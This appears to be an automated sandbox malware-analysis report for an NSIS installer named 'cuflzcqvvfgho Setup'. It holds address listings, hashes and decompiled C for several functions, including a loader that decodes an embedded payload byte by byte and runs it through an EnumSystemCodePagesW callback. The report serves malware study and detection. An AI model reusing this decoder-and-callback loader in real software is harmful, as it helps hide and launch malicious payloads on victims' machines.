                                            0x0040623d
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406318
                                            0x0040631b
                                            0x00406292
                                            0x00406292
                                            0x00406298
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x004063a5
                                            0x004063a8
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x00406348
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x0040657f
                                            0x0040657f
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406321
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00000000
                                            0x0040628f
                                            0x0040631b
                                            0x00406224
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00000000
                                            0x0040683d
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x00000000
                                            0x004069b0
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00000000
                                            0x00406805
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                            • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                            • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                            • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10003D10, Relevance: 4.7, APIs: 3, Instructions: 232COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 16%
                                            			E10003D10(void* __edx, void* __eflags) {
				signed int _v20;
				signed int _v24;
				signed int _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				intOrPtr _t116;
				void* _t127;
				void* _t214;
				intOrPtr* _t279;

				_v20 = 0;
				 *_t279 = 0xbebc200; // executed
				_t116 = E1000590F(_t127, __edx, _t214); // executed
				_v20 = _t116;
				if(_v20 != 0) {
					 *_t279 = _v20;
					_v40 = 0xde;
					_v36 = 0xbebc200;
					E10007DC0();
					_v24 = 0;
					_v24 = 0;
					while(_v24 < 0x12be) {
						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) + 0x5f;
						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0x00000048;
						_v25 = (_v25 & 0x000000ff) + 0x89;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = (_v25 & 0x000000ff) - 0x9c;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - 5;
						_v25 = (_v25 & 0x000000ff) >> 0x00000006 | (_v25 & 0x000000ff) << 0x00000002;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + 0xb6;
						_v25 = (_v25 & 0x000000ff) >> 0x00000007 | (_v25 & 0x000000ff) << 0x00000001;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + 0xa;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - 0x6f;
						_v25 = _v25 & 0x000000ff ^ 0x00000036;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0x00000078;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = 0 - (_v25 & 0x000000ff);
						 *((char*)(_v24 +  &E1001A000)) = _v25;
						_v24 = _v24 + 1;
					}
					 *_t279 =  &E1001A000;
					_v40 = 0;
					_v32 = 0;
					EnumSystemCodePagesW(??, ??); // executed
				}
				return 0;
			}















                                            0x10003d19
                                            0x10003d20
                                            0x10003d27
                                            0x10003d2c
                                            0x10003d33
                                            0x10003d3c
                                            0x10003d3f
                                            0x10003d47
                                            0x10003d4f
                                            0x10003d54
                                            0x10003d5b
                                            0x10003d62
                                            0x10003d7b
                                            0x10003d89
                                            0x10003d97
                                            0x10003da2
                                            0x10003db5
                                            0x10003dc0
                                            0x10003dcc
                                            0x10003de1
                                            0x10003def
                                            0x10003dfb
                                            0x10003e0a
                                            0x10003e15
                                            0x10003e23
                                            0x10003e38
                                            0x10003e47
                                            0x10003e53
                                            0x10003e5f
                                            0x10003e74
                                            0x10003e80
                                            0x10003e8e
                                            0x10003e9c
                                            0x10003ea7
                                            0x10003eb3
                                            0x10003ec2
                                            0x10003ed7
                                            0x10003ee2
                                            0x10003eee
                                            0x10003efa
                                            0x10003f05
                                            0x10003f1a
                                            0x10003f28
                                            0x10003f34
                                            0x10003f42
                                            0x10003f50
                                            0x10003f5c
                                            0x10003f68
                                            0x10003f74
                                            0x10003f82
                                            0x10003f8e
                                            0x10003f9a
                                            0x10003fa3
                                            0x10003fac
                                            0x10003fb9
                                            0x10003fb9
                                            0x10003fc9
                                            0x10003fcc
                                            0x10003fd4
                                            0x10003fd7
                                            0x10003fdd
                                            0x10003fe9

                                            APIs
                                            • _malloc.LIBCMT ref: 10003D27
                                              • Part of subcall function 1000590F: __FF_MSGBANNER.LIBCMT ref: 10005926
                                              • Part of subcall function 1000590F: __NMSG_WRITE.LIBCMT ref: 1000592D
                                              • Part of subcall function 1000590F: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005952
                                            • _memset.LIBCMT ref: 10003D4F
                                            • EnumSystemCodePagesW.KERNEL32 ref: 10003FD7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                                            • String ID:
                                            • API String ID: 2588709530-0
                                            • Opcode ID: 031116cd90df89f2927efd24ffa5ba8bc50ba27358956488d1ff05d19921b791
                                            • Instruction ID: e9c2c10cac31a9925b520c158ffd2a2fd9b939d8f051bf7b59b19317cd3075d4
                                            • Opcode Fuzzy Hash: 031116cd90df89f2927efd24ffa5ba8bc50ba27358956488d1ff05d19921b791
                                            • Instruction Fuzzy Hash: 7AA1D765E191EA4ACF0A86BD50629FFBEF35E66191F0D058EECD2773C2C5900904D7B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                            0x00405e9e
                                            0x00405ea7
                                            0x00000000
                                            0x00405eb4
                                            0x00405eaa
                                            0x00000000

                                            APIs
                                            • FindFirstFileA.KERNEL32(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                            • FindClose.KERNEL32(00000000), ref: 00405EAA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                            • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                            • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                            • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "cuflzcqvvfgho Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
